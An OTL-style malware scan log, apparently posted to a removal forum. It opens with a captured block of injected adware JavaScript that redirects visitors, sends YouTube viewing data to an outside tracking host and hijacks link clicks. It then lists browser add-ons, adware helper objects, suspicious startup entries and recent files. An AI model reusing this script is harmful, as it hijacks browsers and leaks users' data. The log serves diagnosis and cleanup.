value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=qdgKrTa9vTY7vTwGfHw9rjaFpjkFrdw%3D&eid=42&hid=16594767138824750826&pid=1160&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var g=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},h=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\")||0:0},k=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},l=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");if(a&&a[1]&&a[1].innerHTML)return(a=a[1].innerHTML.replace(/[^0-9]/g,\"\"))||0;if(a&&a[0]&&a[0].innerHTML||(a=document.getElementsByClassName(\"_mov\"))&&a[0]&&a[0].innerHTML)return(a=a[0].innerHTML.replace(/[^0-9]/g,\"\"))||0};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{var e=document.getElementsByTagName(\"body\")[0];if(!e.getAttribute(\"wyttb\")){e.setAttribute(\"wyttb\",\"1\");var f=g(),d=h(),m=k(),n=l();f&&d&&d&&((new Image).src=\"https://score.transferin.in/v.php?id=\"+f+\"&n=\"+d+\"&c=\"+m+\"&s=\"+n+\"&cb=46.204.86.12\")}}catch(p){}})();;if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1.03\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: wrc%40avast.com:9.0.2018.95
FF - prefs.js..extensions.enabledAddons: %7Be4a8a97b-f2ed-450b-b12d-ee082ba24781%7D:2.3
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:34.0.5
 
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_246.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.11.2: C:\Program Files\Java\jre8\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.11.2: C:\Program Files\Java\jre8\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3528.0331: C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@ngm.nexoneu.com/NxGame: C:\ProgramData\NexonEU\NGM\npNxGameEU.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10: C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (globalUpdate)
FF - HKLM\Software\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4: C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (globalUpdate)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\BHP\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\BHP\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-06-12 17:58:35 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\faststartff@gmail.com: C:\Users\BHP\AppData\Roaming\Mozilla\Firefox\Profiles\1jnq2kwm.default\extensions\faststartff@gmail.com
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Components: C:\Program Files\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins
 
[2014-06-12 17:49:23 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BHP\AppData\Roaming\mozilla\Extensions
[2015-01-07 14:32:38 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BHP\AppData\Roaming\mozilla\Firefox\Profiles\1jnq2kwm.default\extensions
[2014-10-29 19:57:38 | 000,304,000 | ---- | M] () (No name found) -- C:\Users\BHP\AppData\Roaming\mozilla\firefox\profiles\1jnq2kwm.default\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi
[2014-12-25 12:31:54 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\browser\extensions
[2014-12-10 20:44:38 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014-06-12 17:58:35 | 000,000,000 | ---D | M] (avast! Online Security) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF
 
[color=#E56717]========== Chrome  ==========[/color]
 
CHR - default_search_provider:  ()
CHR - default_search_provider: search_url = 
CHR - default_search_provider: suggest_url = 
CHR - homepage: http://istart.webssearches.com/?type=hp&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889
CHR - default_search_provider:  ()
CHR - default_search_provider: search_url = 
CHR - default_search_provider: suggest_url = 
CHR - homepage: 283D5AC53C5E4FCD7CE6E7FB6EAECF5450FBC02D290A017B494D750F5BDD3AFC
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\djeoofodakffcboeiipgjajlfkppplha\3.9\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbddejkiaboppgjbbeljnhdfejceijam\2.2_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkndcbhcgphcfkkddanakjiepeknbgle\1.3.337.3_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2014-06-19 19:25:07 | 000,000,851 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2 - BHO: (TheTorntv V10) - {11111111-1111-1111-1111-110611111177} - C:\Program Files\TheTorntv V10\TheTorntv V10-bho.dll File not found
O2 - BHO: (Ge-Force) - {11111111-1111-1111-1111-110611971195} - C:\Program Files\Ge-Force\Ge-Force-bho.dll (iWebar)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre8\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Cyti Web 1.0.0.6) - {aa2fac44-d24d-4fed-9e32-397d138365f1} - C:\Program Files\Cyti Web\CytiWebBHO.dll File not found
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre8\bin\jp2ssv.dll (Oracle Corporation)
O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
O4 - HKLM..\Run: [BCSSync] C:\Program Files\Microsoft Office\Office14\BCSSync.exe (Microsoft Corporation)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKLM..\Run: [mbot_pl_4]  File not found
O4 - HKLM..\Run: [snpstd] C:\Windows\vsnpstd.exe ()
O4 - HKLM..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe (Nullsoft, Inc.)
O4 - HKLM..\Run: [Wireless Console 3] C:\Program Files\ASUS\Wireless Console 3\wcourier.exe ()
O4 - HKLM..\Run: [YTDownloader] "C:\Program Files\YTDownloader\YTDownloader.exe" /boot File not found
O4 - HKCU..\Run: [Akamai NetSession Interface] "C:\Users\BHP\AppData\Local\Akamai\netsession_win.exe" File not found
O4 - HKCU..\Run: [Facebook Update] C:\Users\BHP\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKCU..\Run: [Internet Manager] C:\Program Files\T-Mobile\InternetManager_H\Internet Manager.exe ()
O4 - HKCU..\Run: [MicroUpdate] C:\Users\BHP\Documents\MSDCSC\msdcsc.exe File not found
O4 - HKCU..\Run: [PriceMeterW] "C:\Users\BHP\AppData\Local\PriceMeter\pricemeterw.exe" File not found
O4 - HKCU..\Run: [screenSHU] C:\Program Files\screenSHU\screenSHU.exe ()
O4 - HKCU..\Run: [Steam] C:\Program Files\Steam\steam.exe (Valve Corporation)
O4 - HKCU..\Run: [YTDownloader] "C:\Program Files\YTDownloader\YTDownloader.exe" /boot File not found
O4 - Startup: C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tworzenie wycinków ekranu i uruchamianie programu OneNote 2010.lnk = C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O8 - Extra context menu item: E&ksportuj do programu Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Wyślij &do programu OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Wyślij do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Wyślij &do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: &Notatki połączone programu OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : &Notatki połączone programu OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13 - gopher Prefix: missing
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{140DD688-FDE0-4937-9A18-3A9767765AC4}: NameServer = 193.41.112.14 193.41.112.18
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1599A17F-54A1-4BEE-B94C-674327D45F4F}: NameServer = 193.41.112.18 193.41.112.14
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1CD2CE1E-2B79-4D01-8001-AB0279002EC9}: NameServer = 193.41.112.18 193.41.112.14
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{963A9DEA-72DC-4777-93DD-DB8E8F8C17EC}: DhcpNameServer = 192.168.0.1
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20 - AppInit_DLLs: (c:\progra~1\pc_boo~1\assist~1.dll) -  File not found
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2009-06-10 22:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O33 - MountPoints2\{81935d64-f304-11e3-b519-74f06dbd7a85}\Shell - "" = AutoRun
O33 - MountPoints2\{81935d64-f304-11e3-b519-74f06dbd7a85}\Shell\AutoRun\command - "" = E:\AutoRun.exe
O33 - MountPoints2\{81935d85-f304-11e3-b519-74f06dbd7a85}\Shell - "" = AutoRun
O33 - MountPoints2\{81935d85-f304-11e3-b519-74f06dbd7a85}\Shell\AutoRun\command - "" = F:\AutoRun.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O34 - HKLM BootExecute: (aswBoot.exe /M:14c3ddcb973 /dir:"C:\Program Files\AVAST Software\Avast")
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]
 
[2015-01-07 14:45:01 | 001,115,648 | ---- | C] (Farbar) -- C:\Users\BHP\Desktop\FRST.exe
[2015-01-07 14:44:44 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\BHP\Desktop\OTL.exe
[2015-01-06 22:16:24 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Enigma Software Group
[2015-01-06 22:16:19 | 000,000,000 | ---D | C] -- C:\Users\BHP\Start Menu
[2015-01-06 22:16:05 | 000,000,000 | ---D | C] -- C:\sh4ldr
[2015-01-06 22:14:44 | 000,000,000 | ---D | C] -- C:\Program Files\Enigma Software Group
[2015-01-06 22:08:45 | 000,000,000 | ---D | C] -- C:\Program Files\Ge-Force
[2015-01-06 21:38:16 | 000,043,152 | ---- | C] (StdLib) -- C:\Windows\System32\drivers\{f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw.sys
[2015-01-06 21:30:23 | 000,000,000 | ---D | C] -- C:\Program Files\Cyti Web
[2015-01-06 21:27:55 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\Installer
[2015-01-06 21:15:31 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\ShopperPro
[2015-01-06 21:15:23 | 000,000,000 | ---D | C] -- C:\Program Files\ShopperPro
[2015-01-06 21:15:11 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\CrashRpt
[2014-12-30 15:52:45 | 000,000,000 | ---D | C] -- C:\MSDCSC
[2014-12-27 17:40:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PicoZip
[2014-12-27 17:40:36 | 000,000,000 | ---D | C] -- C:\Program Files\PicoZipRT
[2014-12-27 17:34:19 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RAR Password Recovery
[2014-12-27 17:34:19 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RAR Password Recovery
[2014-12-27 17:34:19 | 000,000,000 | ---D | C] -- C:\Program Files\Intelore
[2014-12-27 11:43:40 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Don't Starve v1.115739
[2014-12-22 10:29:51 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\FLT
[2014-12-22 10:29:32 | 000,000,000 | ---D | C] -- C:\Users\BHP\Documents\Klei
[2014-12-18 16:04:06 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe
[2014-12-16 17:52:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
[2014-12-16 17:52:59 | 000,000,000 | ---D | C] -- C:\Program Files\LogMeIn Hamachi
[2014-12-15 21:46:49 | 000,661,272 | ---- | C] (TMRG,  Inc.) -- C:\Windows\System32\rlls.dll
[2014-12-15 17:10:34 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder
[2014-12-15 17:10:32 | 000,000,000 | ---D | C] -- C:\Program Files\WarThunder
[2014-12-13 10:03:48 | 000,000,000 | ---D | C] -- C:\Windows\System32\appraiser
[2014-12-12 15:21:48 | 003,209,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mf.dll
[2014-12-12 15:21:48 | 000,103,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mfps.dll
[2014-12-12 15:21:48 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\rrinstaller.exe
[2014-12-12 15:21:48 | 000,023,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mfpmp.exe
[2014-12-12 15:21:48 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mferror.dll
[2014-12-11 13:00:58 | 001,160,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aitstatic.exe
[2014-12-11 13:00:58 | 000,873,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aeinv.dll
[2014-12-11 13:00:58 | 000,728,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\appraiser.dll
[2014-12-11 13:00:58 | 000,159,744 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aepic.dll
[2014-12-11 13:00:57 | 000,610,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\invagent.dll
[2014-12-11 13:00:57 | 000,337,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\generaltel.dll
[2014-12-11 13:00:57 | 000,315,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\devinv.dll
[2014-12-11 13:00:56 | 000,202,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aepdu.dll
[2014-12-11 13:00:47 | 000,102,912 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollector.exe
[2014-12-11 13:00:47 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\JavaScriptCollectionAgent.dll
[2014-12-11 13:00:47 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwproxystub.dll
[2014-12-11 13:00:46 | 000,667,648 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MsSpellCheckingFacility.exe
[2014-12-11 13:00:46 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9diag.dll
[2014-12-11 13:00:46 | 000,418,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtmsft.dll
[2014-12-11 13:00:46 | 000,047,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll
[2014-12-11 13:00:46 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollectorres.dll
[2014-12-11 13:00:44 | 000,285,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtrans.dll
[2014-12-11 13:00:43 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll
[2014-12-11 13:00:41 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtmlmedia.dll
[2014-12-11 13:00:41 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MshtmlDac.dll
[2014-12-11 13:00:39 | 004,299,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll
[2014-12-11 13:00:36 | 000,684,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe
[2014-12-11 13:00:36 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll
[2014-12-11 13:00:34 | 000,342,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iedkcs32.dll
[2014-12-11 13:00:33 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dll
[2014-12-11 13:00:33 | 000,688,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll
[2014-12-11 13:00:32 | 002,724,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb
[2014-12-11 13:00:31 | 002,052,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl
[2014-12-11 13:00:31 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msrating.dll
[2014-12-11 13:00:30 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll
[2014-12-11 12:54:23 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\tzres.dll
[2014-12-11 12:53:23 | 000,155,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\charmap.exe
[2014-12-11 12:52:55 | 000,248,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WSManMigrationPlugin.dll
[2014-12-11 12:52:55 | 000,214,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WsmWmiPl.dll
[2014-12-11 12:52:55 | 000,198,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WSManHTTPConfig.exe
[2014-12-11 12:52:55 | 000,145,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WsmAuto.dll
[2014-12-08 21:19:02 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\Eclipse
[2014-12-08 20:21:53 | 000,000,000 | ---D | C] -- C:\Users\BHP\Documents\Visual Studio 2013
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]
 
[2015-01-07 14:45:38 | 000,380,416 | ---- | M] () -- C:\Users\BHP\Desktop\yz2k5433.exe
[2015-01-07 14:45:05 | 001,115,648 | ---- | M] (Farbar) -- C:\Users\BHP\Desktop\FRST.exe
[2015-01-07 14:44:48 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\BHP\Desktop\OTL.exe
[2015-01-07 14:42:00 | 000,001,446 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-7.job
[2015-01-07 14:41:00 | 000,001,030 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015-01-07 14:14:40 | 000,022,336 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015-01-07 14:14:40 | 000,022,336 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015-01-07 14:08:12 | 000,005,820 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-6.job
[2015-01-07 14:08:03 | 000,000,930 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
